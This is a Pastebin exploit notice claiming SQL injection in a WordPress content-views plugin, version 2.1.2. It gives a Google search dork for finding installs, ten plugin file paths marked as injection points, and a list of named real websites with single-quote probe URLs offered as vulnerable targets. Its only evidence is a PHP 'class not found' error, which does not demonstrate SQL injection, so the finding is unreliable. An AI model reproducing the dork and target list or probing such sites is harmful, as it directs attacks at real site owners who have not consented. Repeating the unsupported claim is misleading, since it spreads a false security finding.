KingSkrupellos

WordPress PT-Content-Views-Pro Plugins 2.1.2 SQL Injection

Jan 27th, 2019
83
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 4.35 KB | None | 0 0
  1. ####################################################################
  2.  
  3. # Exploit Title : WordPress PT-Content-Views-Pro Plugins 2.1.2 SQL Injection
  4. # Author [ Discovered By ] : KingSkrupellos
  5. # Team : Cyberizm Digital Security Army
  6. # Date : 28/01/2019
  7. # Vendor Homepage : contentviewspro.com
  8. # Software Download Link : downloads.wordpress.org/plugin/content-views-query-and-display-post-page.2.1.2.zip
  9. # Software Information Link : wordpress.org/plugins/content-views-query-and-display-post-page/
  10. # Software Version : 2.1.2
  11. # Tested On : Windows and Linux
  12. # Category : WebApps
  13. # Exploit Risk : Medium
  14. # Google Dorks : inurl:''/wp-content/plugins/pt-content-views-pro/''
  15. # Vulnerability Type : CWE-89 [ Improper Neutralization of
  16. Special Elements used in an SQL Command ('SQL Injection') ]
  17.  
  18. ####################################################################
  19.  
  20. # Description about Software :
  21. ***************************
  22.  
  23. "ContentViews – Post Grid & List pt-content-views-pro" is open source software for WordPress.
  24.  
  25. ####################################################################
  26.  
  27. # Impact :
  28. ***********
  29.  
  30. * WordPress PT-Content-Views-Pro Plugins 2.1.2 is prone to an
  31.  
  32. SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied
  33.  
  34. data before using it in an SQL query.
  35.  
  36. * Exploiting this issue could allow an attacker to compromise the application, read,
  37.  
  38. access or modify data, or exploit latent vulnerabilities in the underlying database.
  39.  
  40. If the webserver is misconfigured, read & write access to the filesystem may be possible.
  41.  
  42. ####################################################################
  43.  
  44. # SQL Injection Exploit :
  45. ***********************
  46.  
  47. /wp-content/plugins/pt-content-views-pro/admin/content-views-admin.php?id=[SQL Injection]
  48.  
  49. /wp-content/plugins/pt-content-views-pro/admin/includes/templates/settings-section-one.php?id=[SQL Injection]
  50.  
  51. /wp-content/plugins/pt-content-views-pro/admin/includes/replayout.php?id=[SQL Injection]
  52.  
  53. /wp-content/plugins/pt-content-views-pro/class-tgm-plugin-activation.php?id=[SQL Injection]
  54.  
  55. /wp-content/plugins/pt-content-views-pro/includes/replace.php?id=[SQL Injection]
  56.  
  57. /wp-content/plugins/pt-content-views-pro/includes/support/acf-fields/image.php?id=[SQL Injection]
  58.  
  59. /wp-content/plugins/pt-content-views-pro/includes/support/acf-fields/relationship.php?id=[SQL Injection]
  60.  
  61. /wp-content/plugins/pt-content-views-pro/includes/support/pll.php?id=[SQL Injection]
  62.  
  63. /wp-content/plugins/pt-content-views-pro/includes/troubleshoot.php?id=[SQL Injection]
  64.  
  65. /wp-content/plugins/pt-content-views-pro/includes/update.php?id=[SQL Injection]
  66.  
  67. ####################################################################
  68.  
  69. # Example Vulnerable Site :
  70. *************************
  71.  
  72. [+] schlesingergroup.com/wp-content/plugins/pt-content-views-pro/admin/includes/replayout.php?id=1%27
  73.  
  74. [+] wegdermee.com/wp-content/plugins/pt-content-views-pro/admin/content-views-admin.php?id=1%27
  75.  
  76. [+] childrenslit.com/wp-content/plugins/pt-content-views-pro/admin/content-views-admin.php?id=1%27
  77.  
  78. [+] globalgreeternetwork.info/wp-content/plugins/pt-content-views-pro/admin/content-views-admin.php?id=1%27
  79.  
  80. [+] happyhormonecottage.com/wp-content/plugins/pt-content-views-pro/admin/content-views-admin.php?id=1%27
  81.  
  82. [+] tekimobile.com/wp-content/plugins/pt-content-views-pro/admin/content-views-admin.php?id=1%27
  83.  
  84. [+] childrenslit.com/wp-content/plugins/pt-content-views-pro/admin/content-views-admin.php?id=1%27
  85.  
  86. [+] globalgreeternetwork.info/wp-content/plugins/pt-content-views-pro/admin/content-views-admin.php?id=1%27
  87.  
  88. [+] actoria.eu/wp-content/plugins/pt-content-views-pro/admin/content-views-admin.php?id=1%27
  89.  
  90. [+] happyhormonecottage.com/wp-content/plugins/pt-content-views-pro/admin/content-views-admin.php?id=1%27
  91.  
  92. [+] greenscapeenergy.co.uk/wp-content/plugins/pt-content-views-pro/admin/content-views-admin.php?id=1%27
  93.  
  94. ####################################################################
  95.  
  96. # Example SQL Database Error :
  97.  
  98. Fatal error: Class 'PT_Content_Views_Admin' not found in
  99. /home/hhcnewserver/public_html/wp-content/plugins/pt-content-views-pro
  100. /admin/content-views-admin.php on line 12
  101.  
  102. ####################################################################
  103.  
  104. # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
  105.  
  106. ####################################################################
Add Comment
Please, Sign In to add comment